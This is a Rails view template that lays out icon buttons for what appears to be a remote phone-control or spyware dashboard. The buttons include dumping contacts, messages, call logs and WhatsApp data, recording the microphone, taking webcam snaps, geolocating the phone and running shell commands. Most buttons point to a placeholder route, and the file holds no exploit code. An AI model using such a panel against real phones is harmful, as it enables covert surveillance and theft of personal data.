<%= stylesheet_link_tag 'smartphones', media: 'all', 'data-turbolinks-track': 'reload' %>
<%= javascript_pack_tag 'smartphones', 'data-turbolinks-track': 'reload' %>

<div class="smartphone">
  <div class="content">
<div class="top-icons">
    <%= link_to image_tag("list_installed_apps.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("uninstall_app.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("open_app.png", :alt => "Get Messages", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Messages"%>
        <%= link_to image_tag("dump_file.png", :alt => "Take Picture", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Take Picture"%>

     <div class="aasdasd">
    <%= link_to image_tag("get_whatsapp_data.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("transfer_file.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("play_audio.png", :alt => "Get Messages", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Messages"%>
        <%= link_to image_tag("dump_screenshot.png", :alt => "Take Picture", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Take Picture"%>
    </div>
    <div class="aasdasd">
    <%= link_to image_tag("dump_contacts.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("dump_messages.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("create_message.png", :alt => "Get Messages", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Messages"%>
        <%= link_to image_tag("dump_call_logs.png", :alt => "Take Picture", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Take Picture"%>
    </div>
    <div class="aasdasd">
    <%= link_to image_tag("get_system_info.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("get_wifi_info.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("dump_localtime.png", :alt => "Get Messages", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Messages"%>
        <%= link_to image_tag("run_shell_command.png", :alt => "Take Picture", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Take Picture"%>
    </div>
        <div class="aasdasd">
    <%= link_to image_tag("wlan_geolocate.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("geolocate.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("dump_screenshot.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("set_audio_mode.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    </div>
    </div>
    

    <div class="bottom-icons">
    <%= link_to image_tag("record_video.png", :alt => "Get Call Logs", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Call Logs"%>
    <%= link_to image_tag("record_mic.png", :alt => "Start Recording", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Start Recording"%>
    <%= link_to image_tag("start_livestream.png", :alt => "Get Messages", :class => "smartphone-icon"), '../smartphones/install', method: :post,
     type: "button", :"data-toggle" => "tooltip", "data-placement": "top",title: "Get Messages"%>
    <%= link_to image_tag("webcam_snap.png", :alt => "Take Picture", :class => "smartphone-icon"), '../pictures/take_picture?smartphone_id=' + smartphone.id.to_s,
         method: :post, type: "button", :"data-toggle" => "tooltip", "data-placement": "top", title: "Take Picture", :remote => true %>
    </div>
  </div>
</div>



